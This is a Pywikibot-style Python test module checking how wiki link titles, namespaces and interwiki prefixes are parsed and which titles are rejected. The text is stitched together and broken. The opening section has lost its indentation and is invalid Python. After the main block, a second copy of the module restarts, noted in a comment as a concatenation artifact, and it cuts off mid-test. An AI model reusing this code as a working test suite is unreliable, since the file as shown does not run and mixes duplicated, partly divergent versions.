title_tests = ['Sandbox', 'A "B"', "A 'B'", '.com', '~', '"', "'",
'Foo/.../Sandbox', 'Sandbox/...', 'A~~', 'X' * 252]
for title in title_tests:
with self.subTest(title=title):
self.assertEqual(Link(title, site).title, title)
self.assertEqual(Link('Talk:Sandbox', site).title, 'Sandbox')
self.assertEqual(Link('Talk:Foo:Sandbox', site).title, 'Foo:Sandbox')
self.assertEqual(Link('File:Example.svg', site).title, 'Example.svg')
self.assertEqual(Link('File_talk:Example.svg', site).title,
'Example.svg')
self.assertEqual(Link(':A', site).title, 'A')
# Length is 256 total, but only title part matters
self.assertEqual(Link('Category:' + 'X' * 248, site).title, 'X' * 248)
self.assertEqual(Link('A%20B', site).title, 'A B')
self.assertEqual(Link('A é B', site).title, 'A é B')
self.assertEqual(Link('A é B', site).title, 'A é B')
self.assertEqual(Link('A é B', site).title, 'A é B')
self.assertEqual(Link('A B', site).title, 'A B')
self.assertEqual(Link('A   B', site).title, 'A B')
anchor_link = Link('A | B', site)
self.assertEqual(anchor_link.title, 'A')
self.assertEqual(anchor_link.anchor, ' B')
section_link = Link('A%23B', site)
self.assertEqual(section_link.title, 'A')
self.assertEqual(section_link.section, 'B')
def test_invalid(self):
"""Test that invalid titles raise InvalidTitle exception."""
exception_message_regex = (
r'^The link does not contain a page title$'
)
texts_to_test = ['', ':', '__ __', ' __ ']
for text in texts_to_test:
with self.assertRaisesRegex(
InvalidTitle,
exception_message_regex):
Link(text, self.get_site()).parse()
# Bad characters forbidden regardless of wgLegalTitleChars
def generate_contains_illegal_chars_exc_regex(text):
exc_regex = (
r'^(u|)\'{}\' contains illegal char\(s\) (u|)\'{}\'$'
.format(re.escape(text), re.escape(text[2])))
return exc_regex
texts_to_test = ['A [ B', 'A ] B', 'A { B', 'A } B', 'A < B', 'A > B']
for text in texts_to_test:
with self.assertRaisesRegex(
InvalidTitle,
generate_contains_illegal_chars_exc_regex(text)):
Link(text, self.get_site()).parse()
# URL encoding
# %XX is understood by wikimedia but not %XXXX
with self.assertRaisesRegex(
InvalidTitle,
r'^(u|)\'A%23B\' contains illegal char\(s\) (u|)\'%23\'$'):
Link('A%2523B', self.get_site()).parse()
# A link is invalid if their (non-)talk page would be in another
# namespace than the link's "other" namespace
with self.assertRaisesRegex(
InvalidTitle,
(r'The \(non-\)talk page of (u|)\'Talk:File:Example.svg\''
r' is a valid title in another namespace.')):
Link('Talk:File:Example.svg', self.get_site()).parse()
# Directory navigation
def generate_contains_dot_combinations_exc_regex(text):
exc_regex = (r'^\(contains \. / combinations\): (u|)\'{}\'$'
.format(re.escape(text)))
return exc_regex
texts_to_test = ['.', '..', './Sandbox', '../Sandbox', 'Foo/./Sandbox',
'Foo/../Sandbox', 'Sandbox/.', 'Sandbox/..']
for text in texts_to_test:
with self.assertRaisesRegex(
InvalidTitle,
generate_contains_dot_combinations_exc_regex(text)):
Link(text, self.get_site()).parse()
# Tilde
def generate_contains_tilde_exc_regex(text):
exc_regex = r'^\(contains ~~~\): (u|)\'%s\'$' % re.escape(text)
return exc_regex
texts_to_test = ['A ~~~ Name', 'A ~~~~ Signature', 'A ~~~~~ Timestamp']
for text in texts_to_test:
with self.assertRaisesRegex(
InvalidTitle,
generate_contains_tilde_exc_regex(text)):
Link(text, self.get_site()).parse()
# Overlength
def generate_overlength_exc_regex(text):
exc_regex = r'^\(over 255 bytes\): (u|)\'%s\'$' % re.escape(text)
return exc_regex
texts_to_test = [('x' * 256), ('Invalid:' + 'X' * 248)]
for text in texts_to_test:
with self.assertRaisesRegex(
InvalidTitle,
generate_overlength_exc_regex(text)):
Link(text, self.get_site()).parse()
# Namespace prefix without actual title
def generate_has_no_title_exc_regex(text):
exc_regex = r'^(u|)\'{}\' has no title\.$'.format(re.escape(text))
return exc_regex
texts_to_test = ['Talk:', 'Category: ', 'Category: #bar']
for text in texts_to_test:
with self.assertRaisesRegex(
InvalidTitle,
generate_has_no_title_exc_regex(text.strip())):
Link(text, self.get_site()).parse()
def test_relative(self):
"""Test that relative links are handled properly."""
# Subpage
page = Page(self.get_site(), 'Foo')
rel_link = Link('/bar', page)
self.assertEqual(rel_link.title, 'Foo/bar')
self.assertEqual(rel_link.site, self.get_site())
# Subpage of Page with section
page = Page(self.get_site(), 'Foo#Baz')
rel_link = Link('/bar', page)
self.assertEqual(rel_link.title, 'Foo/bar')
self.assertEqual(rel_link.site, self.get_site())
# Non-subpage link text beginning with slash
abs_link = Link('/bar', self.get_site())
self.assertEqual(abs_link.title, '/bar')
class Issue10254TestCase(DefaultDrySiteTestCase):
    """Test T102461 (Python issue 10254)."""
    def setUp(self):
        """Set up test case."""
        super(Issue10254TestCase, self).setUp()
        # Remember the real unicodedata module used by pywikibot.page so
        # tearDown can restore it even if a test swaps in a replacement.
        self._orig_unicodedata = pywikibot.page.unicodedata
    def tearDown(self):
        """Tear down test case."""
        # Restore whatever unicodedata implementation was active before setUp.
        pywikibot.page.unicodedata = self._orig_unicodedata
        super(Issue10254TestCase, self).tearDown()
    def test_no_change(self):
        """Test T102461 (Python issue 10254) is not encountered."""
        # Title contains combining characters; the referenced Python bug
        # affected normalization of such strings. The title must round-trip
        # through Link unchanged.
        title = 'Li̍t-sṳ́'
        link = Link(title, self.site)
        self.assertEqual(link.title, 'Li̍t-sṳ́')
# ---- The first set of tests are explicit links, starting with a ':'.
class TestPartiallyQualifiedExplicitLinkSameSiteParser(LinkTestCase):
"""Link tests."""
family = 'wikipedia'
code = 'en'
cached = True
def test_partially_qualified_NS0_code(self):
"""Test ':wikipedia:Main Page' on enwp is namespace 4."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link(':wikipedia:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 4)
def test_partially_qualified_NS1_code(self):
"""Test ':wikipedia:Talk:Main Page' on enwp is namespace 4."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link(':wikipedia:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Talk:Main Page')
self.assertEqual(link.namespace, 4)
def test_partially_qualified_NS0_family(self):
"""Test ':en:Main Page' on enwp is namespace 0."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link(':en:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 0)
def test_partially_qualified_NS1_family(self):
"""Test ':en:Talk:Main Page' on enwp is namespace 1."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link(':en:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 1)
class TestPartiallyQualifiedExplicitLinkDifferentCodeParser(LinkTestCase):
"""Link tests."""
family = 'wikipedia'
code = 'en'
cached = True
def test_partially_qualified_NS0_family(self):
"""Test ':en:Main Page' on dewp is namespace 0."""
config.mylang = 'de'
config.family = 'wikipedia'
link = Link(':en:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 0)
def test_partially_qualified_NS1_family(self):
"""Test ':en:Talk:Main Page' on dewp is namespace 1."""
config.mylang = 'de'
config.family = 'wikipedia'
link = Link(':en:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 1)
class TestPartiallyQualifiedExplicitLinkDifferentFamilyParser(LinkTestCase):
"""Link tests."""
family = 'wikipedia'
code = 'en'
cached = True
def test_partially_qualified_NS0_code(self):
"""Test ':wikipedia:Main Page' on enws is namespace 0."""
config.mylang = 'en'
config.family = 'wikisource'
link = Link(':wikipedia:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 0)
def test_partially_qualified_NS1_code(self):
"""Test ':wikipedia:Talk:Main Page' on enws is ns 1."""
config.mylang = 'en'
config.family = 'wikisource'
link = Link(':wikipedia:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 1)
class TestFullyQualifiedSameNamespaceFamilyParser(LinkTestCase):
"""Link tests."""
family = 'wikipedia'
code = 'en'
cached = True
def test_namespace_vs_family(self):
"""Test namespace is selected before family."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link(':wikipedia:en:Main Page')
link.parse()
self.assertEqual(link.title, 'En:Main Page')
self.assertEqual(link.namespace, 4)
link = Link(':wikipedia:en:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'En:Talk:Main Page')
self.assertEqual(link.namespace, 4)
class TestFullyQualifiedExplicitLinkSameFamilyParser(LinkTestCase):
"""Link tests."""
family = 'wikipedia'
code = 'en'
cached = True
def test_fully_qualified_NS0_code(self):
"""Test ':en:wikipedia:Main Page' on enwp is namespace 4."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link(':en:wikipedia:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 4)
def test_fully_qualified_NS1_code(self):
"""Test ':en:wikipedia:Talk:Main Page' on enwp is namespace 4."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link(':en:wikipedia:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Talk:Main Page')
self.assertEqual(link.namespace, 4)
class TestFullyQualifiedExplicitLinkDifferentFamilyParser(LinkTestCase):
    """Test link to a different family."""
    sites = {
        'enws': {
            'family': 'wikisource',
            'code': 'en'
        },
        'enwp': {
            'family': 'wikipedia',
            'code': 'en'
        }
    }
    cached = True
    def test_fully_qualified_NS0_code(self):
        """Test ':en:wikipedia:Main Page' on enws resolves to enwp ns 0."""
        config.mylang = 'en'
        config.family = 'wikisource'
        link = Link(':en:wikipedia:Main Page')
        link.parse()
        self.assertEqual(link.site, self.get_site('enwp'))
        self.assertEqual(link.title, 'Main Page')
        self.assertEqual(link.namespace, 0)
    def test_fully_qualified_NS1_code(self):
        """Test ':en:wikipedia:Talk:Main Page' on enws resolves to enwp ns 1."""
        config.mylang = 'en'
        config.family = 'wikisource'
        link = Link(':en:wikipedia:Talk:Main Page')
        link.parse()
        self.assertEqual(link.site, self.get_site('enwp'))
        self.assertEqual(link.title, 'Main Page')
        self.assertEqual(link.namespace, 1)
    def test_fully_qualified_NS0_family(self):
        """Test ':wikipedia:en:Main Page' on enws resolves to enwp ns 0."""
        config.mylang = 'en'
        config.family = 'wikisource'
        link = Link(':wikipedia:en:Main Page')
        link.parse()
        self.assertEqual(link.site, self.get_site('enwp'))
        self.assertEqual(link.title, 'Main Page')
        self.assertEqual(link.namespace, 0)
    def test_fully_qualified_NS1_family(self):
        """Test ':wikipedia:en:Talk:Main Page' on enws resolves to enwp ns 1."""
        config.mylang = 'en'
        config.family = 'wikisource'
        link = Link(':wikipedia:en:Talk:Main Page')
        link.parse()
        self.assertEqual(link.site, self.get_site('enwp'))
        self.assertEqual(link.title, 'Main Page')
        self.assertEqual(link.namespace, 1)
class TestFullyQualifiedExplicitLinkNoLangConfigFamilyParser(LinkTestCase):

    """Test link from family without lang code to a different family."""

    sites = {
        'wikidata': {
            'family': 'wikidata',
            'code': 'wikidata'
        },
        'enwp': {
            'family': 'wikipedia',
            'code': 'en'
        }
    }
    cached = True

    def _assert_parsed(self, text, title, namespace):
        """Parse *text* with wikidata as default and verify against enwp."""
        config.mylang = 'wikidata'
        config.family = 'wikidata'
        lnk = Link(text)
        lnk.parse()
        self.assertEqual(lnk.site, self.get_site('enwp'))
        self.assertEqual(lnk.title, title)
        self.assertEqual(lnk.namespace, namespace)

    def test_fully_qualified_NS0_code(self):
        """Test ':en:wikipedia:Main Page' on wikidata is namespace 4."""
        self._assert_parsed(':en:wikipedia:Main Page', 'Main Page', 4)

    def test_fully_qualified_NS1_code(self):
        """Test ':en:wikipedia:Talk:Main Page' on wikidata is namespace 4."""
        self._assert_parsed(':en:wikipedia:Talk:Main Page',
                            'Talk:Main Page', 4)

    def test_fully_qualified_NS0_family(self):
        """Test ':wikipedia:en:Main Page' on wikidata is namespace 0."""
        self._assert_parsed(':wikipedia:en:Main Page', 'Main Page', 0)

    def test_fully_qualified_NS1_family(self):
        """Test ':wikipedia:en:Talk:Main Page' on wikidata is namespace 1."""
        self._assert_parsed(':wikipedia:en:Talk:Main Page', 'Main Page', 1)
class TestFullyQualifiedNoLangFamilyExplicitLinkParser(LinkTestCase):

    """Test wikibase links."""

    sites = {
        'wikidata': {
            'family': 'wikidata',
            'code': 'wikidata'
        },
        'enwp': {
            'family': 'wikipedia',
            'code': 'en'
        },
        'test.wp': {
            'family': 'wikipedia',
            'code': 'test'
        },
    }
    cached = True

    def _assert_parsed(self, text, site_key, title, namespace):
        """Parse *text* on enwp and check it targets the *site_key* site."""
        config.mylang = 'en'
        config.family = 'wikipedia'
        lnk = Link(text)
        lnk.parse()
        self.assertEqual(lnk.site, self.get_site(site_key))
        self.assertEqual(lnk.title, title)
        self.assertEqual(lnk.namespace, namespace)

    def test_fully_qualified_NS0_code(self):
        """Test ':testwiki:wikidata:Q6' on enwp is namespace 0."""
        self._assert_parsed(':testwiki:wikidata:Q6', 'wikidata', 'Q6', 0)

    def test_fully_qualified_NS1_code(self):
        """Test ':testwiki:wikidata:Talk:Q6' on enwp is namespace 1."""
        self._assert_parsed(':testwiki:wikidata:Talk:Q6', 'wikidata', 'Q6', 1)

    def test_fully_qualified_NS0_family(self):
        """Test ':wikidata:testwiki:Q6' on enwp is namespace 0."""
        self._assert_parsed(':wikidata:testwiki:Q6', 'test.wp', 'Q6', 0)

    def test_fully_qualified_NS1_family(self):
        """Test ':wikidata:testwiki:Talk:Q6' on enwp is namespace 1."""
        self._assert_parsed(':wikidata:testwiki:Talk:Q6', 'test.wp', 'Q6', 1)
class TestFullyQualifiedOneSiteFamilyExplicitLinkParser(LinkTestCase):

    """Test links to one site target family."""

    family = 'species'
    code = 'species'
    cached = True

    def _assert_parsed(self, text, title, namespace):
        """Parse *text* on enwp and verify it points at species."""
        config.mylang = 'en'
        config.family = 'wikipedia'
        lnk = Link(text)
        lnk.parse()
        self.assertEqual(lnk.site, self.get_site())
        self.assertEqual(lnk.title, title)
        self.assertEqual(lnk.namespace, namespace)

    def test_fully_qualified_NS0_code(self):
        """Test ':species:species:Main Page' on species is namespace 0."""
        self._assert_parsed(':species:species:Main Page', 'Main Page', 0)

    def test_fully_qualified_NS1_code(self):
        """Test ':species:species:Talk:Main Page' on species is namespace 1."""
        self._assert_parsed(':species:species:Talk:Main Page', 'Main Page', 1)
# ---- Tests of a Link without colons, which shouldn't be interwikis, follow.
class TestPartiallyQualifiedImplicitLinkSameSiteParser(LinkTestCase):

    """Test partially qualified links to same site."""

    family = 'wikipedia'
    code = 'en'
    cached = True

    def _assert_parsed(self, text, title, namespace):
        """Parse *text* on enwp and verify site, title and namespace."""
        config.mylang = 'en'
        config.family = 'wikipedia'
        lnk = Link(text)
        lnk.parse()
        self.assertEqual(lnk.site, self.get_site())
        self.assertEqual(lnk.title, title)
        self.assertEqual(lnk.namespace, namespace)

    def test_partially_qualified_NS0_code(self):
        """Test 'wikipedia:Main Page' on enwp is namespace 4."""
        self._assert_parsed('wikipedia:Main Page', 'Main Page', 4)

    def test_partially_qualified_NS1_code(self):
        """Test 'wikipedia:Talk:Main Page' on enwp is namespace 4."""
        self._assert_parsed('wikipedia:Talk:Main Page', 'Talk:Main Page', 4)

    def test_partially_qualified_NS0_family(self):
        """Test 'en:Main Page' on enwp is namespace 0."""
        self._assert_parsed('en:Main Page', 'Main Page', 0)

    def test_partially_qualified_NS1_family(self):
        """Test 'en:Talk:Main Page' on enwp is namespace 1."""
        self._assert_parsed('en:Talk:Main Page', 'Main Page', 1)
class TestPartiallyQualifiedImplicitLinkDifferentCodeParser(LinkTestCase):

    """Test partially qualified links to different code."""

    family = 'wikipedia'
    code = 'en'
    cached = True

    def _assert_parsed(self, text, title, namespace):
        """Parse *text* with dewp as default and verify it targets enwp."""
        config.mylang = 'de'
        config.family = 'wikipedia'
        lnk = Link(text)
        lnk.parse()
        self.assertEqual(lnk.site, self.get_site())
        self.assertEqual(lnk.title, title)
        self.assertEqual(lnk.namespace, namespace)

    def test_partially_qualified_NS0_family(self):
        """Test 'en:Main Page' on dewp is namespace 0."""
        self._assert_parsed('en:Main Page', 'Main Page', 0)

    def test_partially_qualified_NS1_family(self):
        """Test 'en:Talk:Main Page' on dewp is namespace 1."""
        self._assert_parsed('en:Talk:Main Page', 'Main Page', 1)
class TestPartiallyQualifiedImplicitLinkDifferentFamilyParser(LinkTestCase):

    """Test partially qualified links to different family."""

    family = 'wikipedia'
    code = 'en'
    cached = True

    def _assert_parsed(self, text, title, namespace):
        """Parse *text* with enws as default and verify the result."""
        config.mylang = 'en'
        config.family = 'wikisource'
        lnk = Link(text)
        lnk.parse()
        self.assertEqual(lnk.site, self.get_site())
        self.assertEqual(lnk.title, title)
        self.assertEqual(lnk.namespace, namespace)

    def test_partially_qualified_NS0_code(self):
        """Test 'wikipedia:Main Page' on enws is namespace 0."""
        self._assert_parsed('wikipedia:Main Page', 'Main Page', 0)

    def test_partially_qualified_NS1_code(self):
        """Test 'wikipedia:Talk:Main Page' on enws is ns 1."""
        self._assert_parsed('wikipedia:Talk:Main Page', 'Main Page', 1)
class TestFullyQualifiedImplicitLinkSameFamilyParser(LinkTestCase):

    """Link tests."""

    family = 'wikipedia'
    code = 'en'
    cached = True

    def _assert_parsed(self, text, title, namespace):
        """Parse *text* on enwp and verify site, title and namespace."""
        config.mylang = 'en'
        config.family = 'wikipedia'
        lnk = Link(text)
        lnk.parse()
        self.assertEqual(lnk.site, self.get_site())
        self.assertEqual(lnk.title, title)
        self.assertEqual(lnk.namespace, namespace)

    def test_fully_qualified_NS0_code(self):
        """Test 'en:wikipedia:Main Page' on enwp is namespace 4."""
        self._assert_parsed('en:wikipedia:Main Page', 'Main Page', 4)

    def test_fully_qualified_NS1_code(self):
        """Test 'en:wikipedia:Talk:Main Page' on enwp is namespace 4."""
        self._assert_parsed('en:wikipedia:Talk:Main Page',
                            'Talk:Main Page', 4)
class TestFullyQualifiedImplicitLinkDifferentFamilyParser(LinkTestCase):

    """Test link to a different family without preleading colon."""

    sites = {
        'enws': {
            'family': 'wikisource',
            'code': 'en'
        },
        'enwp': {
            'family': 'wikipedia',
            'code': 'en'
        }
    }
    cached = True

    def test_fully_qualified_NS0_code(self):
        """Test 'en:wikipedia:Main Page' on enws is namespace 0."""
        config.mylang = 'en'
        config.family = 'wikisource'
        link = Link('en:wikipedia:Main Page')
        link.parse()
        # Resolves to the wikipedia family site, not the local enws one.
        self.assertEqual(link.site, self.get_site('enwp'))
        self.assertEqual(link.title, 'Main Page')
        self.assertEqual(link.namespace, 0)

    def test_fully_qualified_NS1_code(self):
        """Test 'en:wikipedia:Talk:Main Page' on enws is namespace 1."""
        config.mylang = 'en'
        config.family = 'wikisource'
        link = Link('en:wikipedia:Talk:Main Page')
        link.parse()
        self.assertEqual(link.site, self.get_site('enwp'))
        self.assertEqual(link.title, 'Main Page')
        self.assertEqual(link.namespace, 1)

    def test_fully_qualified_NS0_family(self):
        """Test 'wikipedia:en:Main Page' on enws is namespace 0."""
        config.mylang = 'en'
        config.family = 'wikisource'
        link = Link('wikipedia:en:Main Page')
        link.parse()
        self.assertEqual(link.site, self.get_site('enwp'))
        self.assertEqual(link.title, 'Main Page')
        self.assertEqual(link.namespace, 0)

    def test_fully_qualified_NS1_family(self):
        """Test 'wikipedia:en:Talk:Main Page' on enws is namespace 1."""
        config.mylang = 'en'
        config.family = 'wikisource'
        link = Link('wikipedia:en:Talk:Main Page')
        link.parse()
        self.assertEqual(link.site, self.get_site('enwp'))
        self.assertEqual(link.title, 'Main Page')
        self.assertEqual(link.namespace, 1)
class TestFullyQualifiedImplicitLinkNoLangConfigFamilyParser(LinkTestCase):

    """Test implicit link from family without lang code to other family."""

    sites = {
        'wikidata': {
            'family': 'wikidata',
            'code': 'wikidata'
        },
        'enwp': {
            'family': 'wikipedia',
            'code': 'en'
        }
    }
    cached = True

    def test_fully_qualified_NS0_code(self):
        """Test 'en:wikipedia:Main Page' on wikidata is namespace 4."""
        config.mylang = 'wikidata'
        config.family = 'wikidata'
        link = Link('en:wikipedia:Main Page')
        link.parse()
        self.assertEqual(link.site, self.get_site('enwp'))
        self.assertEqual(link.title, 'Main Page')
        self.assertEqual(link.namespace, 4)

    def test_fully_qualified_NS1_code(self):
        """Test 'en:wikipedia:Talk:Main Page' on wikidata is namespace 4, not 1."""
        config.mylang = 'wikidata'
        config.family = 'wikidata'
        link = Link('en:wikipedia:Talk:Main Page')
        link.parse()
        self.assertEqual(link.site, self.get_site('enwp'))
        # 'wikipedia:' is taken as the project namespace, so the 'Talk:'
        # part stays inside the title and the namespace is 4.
        self.assertEqual(link.title, 'Talk:Main Page')
        self.assertEqual(link.namespace, 4)

    def test_fully_qualified_NS0_family(self):
        """Test 'wikipedia:en:Main Page' on wikidata is namespace 0."""
        config.mylang = 'wikidata'
        config.family = 'wikidata'
        link = Link('wikipedia:en:Main Page')
        link.parse()
        self.assertEqual(link.site, self.get_site('enwp'))
        self.assertEqual(link.namespace, 0)
        self.assertEqual(link.title, 'Main Page')

    def test_fully_qualified_NS1_family(self):
        """Test 'wikipedia:en:Talk:Main Page' on wikidata is namespace 1."""
        config.mylang = 'wikidata'
        config.family = 'wikidata'
        link = Link('wikipedia:en:Talk:Main Page')
        link.parse()
        self.assertEqual(link.site, self.get_site('enwp'))
        self.assertEqual(link.title, 'Main Page')
        self.assertEqual(link.namespace, 1)
class TestFullyQualifiedNoLangFamilyImplicitLinkParser(LinkTestCase):

    """Test wikibase links without preleading colon."""

    family = 'wikidata'
    code = 'test'
    cached = True

    def _assert_parsed(self, text, site_code, site_fam, title, namespace):
        """Parse *text* on enwp and check the resolved target site."""
        config.mylang = 'en'
        config.family = 'wikipedia'
        lnk = Link(text)
        lnk.parse()
        self.assertEqual(lnk.site, pywikibot.Site(site_code, site_fam))
        self.assertEqual(lnk.title, title)
        self.assertEqual(lnk.namespace, namespace)

    def test_fully_qualified_NS0_code(self):
        """Test 'testwiki:wikidata:Q6' on enwp is namespace 0."""
        self._assert_parsed('testwiki:wikidata:Q6',
                            'wikidata', 'wikidata', 'Q6', 0)

    def test_fully_qualified_NS1_code(self):
        """Test 'testwiki:wikidata:Talk:Q6' on enwp is namespace 1."""
        self._assert_parsed('testwiki:wikidata:Talk:Q6',
                            'wikidata', 'wikidata', 'Q6', 1)

    def test_fully_qualified_NS0_family(self):
        """Test 'wikidata:testwiki:Q6' on enwp is namespace 0."""
        self._assert_parsed('wikidata:testwiki:Q6',
                            'test', 'wikipedia', 'Q6', 0)

    def test_fully_qualified_NS1_family(self):
        """Test 'wikidata:testwiki:Talk:Q6' on enwp is namespace 1."""
        self._assert_parsed('wikidata:testwiki:Talk:Q6',
                            'test', 'wikipedia', 'Q6', 1)
class TestFullyQualifiedOneSiteFamilyImplicitLinkParser(LinkTestCase):

    """Test links to one site target family without preleading colon."""

    family = 'species'
    code = 'species'
    cached = True

    def _assert_parsed(self, text, title, namespace):
        """Parse *text* on enwp and verify it points at species."""
        config.mylang = 'en'
        config.family = 'wikipedia'
        lnk = Link(text)
        lnk.parse()
        self.assertEqual(lnk.site, self.get_site())
        self.assertEqual(lnk.title, title)
        self.assertEqual(lnk.namespace, namespace)

    def test_fully_qualified_NS0_family_code(self):
        """Test 'species:species:Main Page' on enwp is namespace 0."""
        self._assert_parsed('species:species:Main Page', 'Main Page', 0)

    def test_fully_qualified_NS1_family_code(self):
        """Test 'species:species:Talk:Main Page' on enwp is namespace 1."""
        self._assert_parsed('species:species:Talk:Main Page', 'Main Page', 1)

    def test_fully_qualified_NS0_code(self):
        """Test 'species:Main Page' on enwp is namespace 0."""
        self._assert_parsed('species:Main Page', 'Main Page', 0)

    def test_fully_qualified_NS1_code(self):
        """Test 'species:Talk:Main Page' on enwp is namespace 1."""
        self._assert_parsed('species:Talk:Main Page', 'Main Page', 1)
class TestEmptyTitle(TestCase):

    """Test links which contain no title."""

    family = 'wikipedia'
    code = 'en'

    def test_interwiki_mainpage(self):
        """Test that Link allow links without a title to the main page."""
        site = self.get_site()
        lnk = Link('en:', site)
        lnk.parse()
        self.assertEqual(lnk.site, site)
        self.assertEqual(lnk.title, '')
        self.assertEqual(lnk.namespace, 0)

    def test_interwiki_namespace_without_title(self):
        """Test that Link doesn't allow links without a title."""
        lnk = Link('en:Help:', self.get_site())
        self.assertRaisesRegex(
            InvalidTitle, "'en:Help:' has no title.", lnk.parse)

    def test_no_text(self):
        """Test that Link doesn't allow empty."""
        lnk = Link('', self.get_site())
        self.assertRaisesRegex(
            InvalidTitle, 'The link does not contain a page title',
            lnk.parse)

    def test_namespace_lookalike(self):
        """Test that Link does only detect valid namespaces."""
        site = self.get_site()
        # 'CAT:' is not a real namespace prefix, so it stays in the title.
        for text in ('CAT:', 'en:CAT:'):
            lnk = Link(text, site)
            lnk.parse()
            self.assertEqual(lnk.site, site)
            self.assertEqual(lnk.title, 'CAT:')
            self.assertEqual(lnk.namespace, 0)
class TestInvalidInterwikiLinks(WikimediaDefaultSiteTestCase):

    """Test links to non-wikis."""

    family = 'wikipedia'
    code = 'en'

    def _assert_bad_prefix(self, text, prefix):
        """Assert that parsing *text* fails on an unsupported prefix."""
        lnk = Link(text, source=self.site)
        self.assertRaisesRegex(
            Error,
            '{0} is not a local page on wikipedia:en, and the '
            'interwiki prefix {1} is not supported by Pywikibot!'
            .format(text, prefix),
            lnk.parse)

    def test_non_wiki_prefix(self):
        """Test that Link fails if the interwiki prefix is not a wiki."""
        self._assert_bad_prefix('bugzilla:1337', 'bugzilla')

    def test_other_wiki_prefix(self):
        """Test that Link fails if the interwiki prefix is a unknown family."""
        self._assert_bad_prefix('bulba:this-will-never-work', 'bulba')
class TestSiteLink(WikimediaDefaultSiteTestCase):

    """Test parsing namespaces when creating SiteLinks."""

    def _test_link(self, link, title, namespace, site_code, site_fam):
        """Test the separate contents of the link."""
        self.assertEqual(link.title, title)
        self.assertEqual(link.namespace, namespace)
        self.assertEqual(link.site, Site(site_code, site_fam))
        self.assertEqual(link.badges, [])

    def test_site_link(self):
        """Test parsing of title."""
        cases = (
            ('Foobar', 'enwiki', 'Foobar', Namespace.MAIN, 'en', 'wikipedia'),
            ('Mall:!!', 'svwiki', '!!', Namespace.TEMPLATE, 'sv',
             'wikipedia'),
            ('Vorlage:!!', 'dewikibooks', '!!', Namespace.TEMPLATE, 'de',
             'wikibooks'),
            ('Ai Weiwei: Never Sorry', 'enwiki', 'Ai Weiwei: Never Sorry',
             Namespace.MAIN, 'en', 'wikipedia'),
        )
        for text, dbname, title, namespace, site_code, site_fam in cases:
            self._test_link(SiteLink(text, dbname),
                            title, namespace, site_code, site_fam)
if __name__ == '__main__':  # pragma: no cover
    try:
        unittest.main()
    except SystemExit:
        # unittest.main() always raises SystemExit; swallow it so running
        # the module directly exits cleanly without a traceback.
        pass
# NOTE(review): what follows appears to be a second, duplicated copy of this
# test module (concatenation artifact); the stray '|' separator was replaced
# with this comment because it was a syntax error.
# -*- coding: utf-8 -*-
"""Test Link functionality."""
#
# (C) Pywikibot team, 2014-2019
#
# Distributed under the terms of the MIT license.
#
from __future__ import absolute_import, division, unicode_literals
import re
import pywikibot
from pywikibot import config2 as config
from pywikibot import Site
from pywikibot.page import Link, Page, SiteLink
from pywikibot.site import Namespace
from pywikibot.exceptions import Error, InvalidTitle
from tests.aspects import (
unittest,
AlteredDefaultSiteTestCase as LinkTestCase,
DefaultDrySiteTestCase,
WikimediaDefaultSiteTestCase,
TestCase,
)
class TestCreateSeparated(DefaultDrySiteTestCase):

    """Test C{Link.create_separated}."""

    def _test_link(self, link, page, section, label):
        """Test the separate contents of the link."""
        self.assertIs(link.site, self.site)
        self.assertEqual(link.title, page)
        # section maps to link.section, label maps to link.anchor;
        # a None expectation means the attribute must be unset.
        for expected, actual in ((section, link.section),
                                 (label, link.anchor)):
            if expected is None:
                self.assertIsNone(actual)
            else:
                self.assertEqual(actual, expected)

    def test(self):
        """Test combinations of parameters."""
        for kwargs, section, label in (
                ({}, None, None),
                ({'section': 'Bar'}, 'Bar', None),
                ({'label': 'Baz'}, None, 'Baz'),
                ({'section': 'Bar', 'label': 'Baz'}, 'Bar', 'Baz')):
            self._test_link(
                Link.create_separated('Foo', self.site, **kwargs),
                'Foo', section, label)
# ---- Tests checking if the parser does (not) accept (in)valid titles
class TestLink(DefaultDrySiteTestCase):

    """
    Test parsing links with DrySite.

    The DrySite is using the builtin namespaces which behaviour is controlled
    in this repository so namespace aware tests do work, even when the actual
    default site is using completely different namespaces.
    """

    def test_valid(self):
        """Test that valid titles are correctly normalized."""
        site = self.get_site()
        title_tests = ['Sandbox', 'A "B"', "A 'B'", '.com', '~', '"', "'",
                       'Foo/.../Sandbox', 'Sandbox/...', 'A~~', 'X' * 252]
        for title in title_tests:
            with self.subTest(title=title):
                self.assertEqual(Link(title, site).title, title)
        # Namespace prefixes are stripped from the title attribute.
        self.assertEqual(Link('Talk:Sandbox', site).title, 'Sandbox')
        self.assertEqual(Link('Talk:Foo:Sandbox', site).title, 'Foo:Sandbox')
        self.assertEqual(Link('File:Example.svg', site).title, 'Example.svg')
        self.assertEqual(Link('File_talk:Example.svg', site).title,
                         'Example.svg')
        self.assertEqual(Link(':A', site).title, 'A')
        # Length is 256 total, but only title part matters
